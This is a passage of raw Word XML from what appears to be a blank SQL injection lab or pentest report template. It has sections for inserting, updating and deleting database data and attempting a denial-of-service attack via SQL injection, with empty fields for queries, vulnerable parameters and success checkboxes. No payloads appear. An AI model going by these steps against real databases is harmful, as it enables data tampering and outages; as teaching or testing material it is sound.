                <w:ilvl w:val="0"/>
                <w:numId w:val="12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F71D071" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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C56451C" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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2D79D632" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRPr="005D2C80" w:rsidRDefault="00C07A43" w:rsidP="00C07A43">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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7A43" w:rsidRPr="005D2C80" w14:paraId="4F8C41E6" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361B0BBD" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRPr="005D2C80" w:rsidRDefault="00C07A43" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="469E27C1" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRPr="005D2C80" w:rsidRDefault="00C07A43" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C67E5A4" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRPr="005D2C80" w:rsidRDefault="00C07A43" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78E185D6" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRDefault="00C07A43" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70274C18" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BE67D1B" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57CA2500" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="200FA982" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12BCBB09" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A3EE279" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32C01D9D" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRPr="005D2C80" w:rsidRDefault="00BE183E" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7ED86AF5" w14:textId="77777777" w:rsidR="00C07A43" w:rsidRPr="005D2C80" w:rsidRDefault="00C07A43" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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412B1B" w:rsidRPr="00A51A96" w14:paraId="16139E9F" w14:textId="77777777" w:rsidTr="00BC5132">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DF9E003" w14:textId="166D947C" w:rsidR="00412B1B" w:rsidRPr="003C713F" w:rsidRDefault="00412B1B" w:rsidP="00972D9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7.8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412B1B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Insert, Update, and Delete Data from Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04BEEAEE" w14:textId="77777777" w:rsidR="004965B2" w:rsidRPr="00BC5132" w:rsidRDefault="004965B2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393"/>
        <w:gridCol w:w="3613"/>
      </w:tblGrid>
      <w:tr w:rsidR="00412B1B" w:rsidRPr="00412B1B" w14:paraId="5CA64FD7" w14:textId="77777777" w:rsidTr="00BC513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892FB2B" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B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6AA74C3" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00412B1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9BA56F1" w14:textId="77777777" w:rsidR="00BC5132" w:rsidRPr="00412B1B" w:rsidRDefault="00BC5132" w:rsidP="00412B1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12B1B" w:rsidRPr="00412B1B" w14:paraId="3CC8FE48" w14:textId="77777777" w:rsidTr="00BC513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351C158" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B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5BA3839" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00412B1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2734FCC" w14:textId="77777777" w:rsidR="00BC5132" w:rsidRPr="00412B1B" w:rsidRDefault="00BC5132" w:rsidP="00412B1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12B1B" w:rsidRPr="00412B1B" w14:paraId="6E9915F0" w14:textId="77777777" w:rsidTr="00BC513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5CFDA57" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B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50A57AD" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00412B1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1F7E857" w14:textId="77777777" w:rsidR="00BC5132" w:rsidRPr="00412B1B" w:rsidRDefault="00BC5132" w:rsidP="00412B1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12B1B" w:rsidRPr="00412B1B" w14:paraId="3F7AAD94" w14:textId="77777777" w:rsidTr="00BC513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1EB8B35" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands/Queries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4481CD6" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="128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D871A82" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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310B2C2" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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2A6ABE6" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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F1D4DDB" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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2407FFC" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00412B1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12B1B" w:rsidRPr="00412B1B" w14:paraId="5D200AE7" w14:textId="77777777" w:rsidTr="00BC513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061E819" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is the data manipulated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2711DF0D" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="1206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412B1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A6B2A3" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="1143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412B1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w:rsidRPr="00B407A7" w14:paraId="43CAAD7C" w14:textId="77777777" w:rsidTr="00BC513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6C548BB" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00BC513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72713C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Database Type Identified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983F5B7" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="0072713C" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072713C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*MySQL, PostgreSQL, MSSQL, Oracle, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6676558E" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9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FA68B8A" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9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4BD0DE3" w14:textId="77777777" w:rsidR="00BC5132" w:rsidRPr="00B407A7" w:rsidRDefault="00BC5132" w:rsidP="00972D9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84DF9" w:rsidRPr="0072713C" w14:paraId="4248AC86" w14:textId="77777777" w:rsidTr="00BC513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16E36BA" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="0072713C" w:rsidRDefault="00084DF9" w:rsidP="00BC513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5B5E05">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Identified Vulnerable Parameters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C365EC1" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="005B5E05">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>User Input Fields, URL Queries, Headers, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDDDC25" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48473CAD" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06533C9B" w14:textId="77777777" w:rsidR="00BC5132" w:rsidRPr="0072713C" w:rsidRDefault="00BC5132" w:rsidP="00972D9E">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w:rsidRPr="00B407A7" w14:paraId="60DEF27B" w14:textId="77777777" w:rsidTr="00BC513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90F5C94" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00BC513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Is the data manipulated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5F9A0B" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00B407A7" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1206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613" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A570A3" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00B407A7" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1143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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w14:paraId="102F519F" w14:textId="77777777" w:rsidTr="00BC513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4094DA5" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00BC513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5B6362">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Insert Query Execution Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F4A189" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1206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613" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE5E281" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1143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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w14:paraId="490BE9F8" w14:textId="77777777" w:rsidTr="00BC513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25B03D4" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005B6362" w:rsidRDefault="00084DF9" w:rsidP="00BC513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5B6362">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Update Query Execution Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78AE7EEE" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1206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613" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59486307" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1143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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w14:paraId="6FE3CFB2" w14:textId="77777777" w:rsidTr="00BC513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91BB48B" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005B6362" w:rsidRDefault="00084DF9" w:rsidP="00BC513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5B6362">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Delete Query Execution Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66EA3673" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1206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613" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4237C094" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="131"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="1143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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00412B1B" w:rsidRPr="00412B1B" w14:paraId="46125007" w14:textId="77777777" w:rsidTr="00BC513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14F2B24" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B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Manipulated Data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536DB25" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="129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481F6D3" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="129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8E6FB6E" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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04891B1" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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B09E7E6" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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12B1B" w:rsidRPr="00412B1B" w14:paraId="2912258B" w14:textId="77777777" w:rsidTr="00BC5132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794ECF1" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00BC513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12B1B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752AF92" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="130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A263B98" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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7C921F8" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A28E25C" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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D80D743" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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2CEF824" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRPr="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="00412B1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68B25763" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005D2C80" w:rsidRDefault="00084DF9" w:rsidP="00084DF9">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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4DF9" w:rsidRPr="005D2C80" w14:paraId="040FFA0E" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CCF6029" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005D2C80" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AA8CDA6" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005D2C80" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18E64175" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005D2C80" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5469EB69" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="005D2C80" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61F3099C" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E79070A" w14:textId="77777777" w:rsidR="00115998" w:rsidRPr="005D2C80" w:rsidRDefault="00115998" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C8613CC" w14:textId="77777777" w:rsidR="00412B1B" w:rsidRDefault="00412B1B" w:rsidP="000947B4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084DF9" w:rsidRPr="00A51A96" w14:paraId="45F23C99" w14:textId="77777777" w:rsidTr="007B3EED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1EF8B2DB" w14:textId="6CD47FA0" w:rsidR="00084DF9" w:rsidRPr="003C713F" w:rsidRDefault="00084DF9" w:rsidP="00972D9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7.9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084DF9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attempt a DoS Attack using SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DB8E495" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="007B3EED" w:rsidRDefault="00084DF9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64"/>
        <w:gridCol w:w="3442"/>
      </w:tblGrid>
      <w:tr w:rsidR="00084DF9" w:rsidRPr="00084DF9" w14:paraId="7C9C87E4" w14:textId="77777777" w:rsidTr="00D90B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AC4A976" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9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5A601B6" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF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84DF9" w:rsidRPr="00084DF9" w14:paraId="50991BC0" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
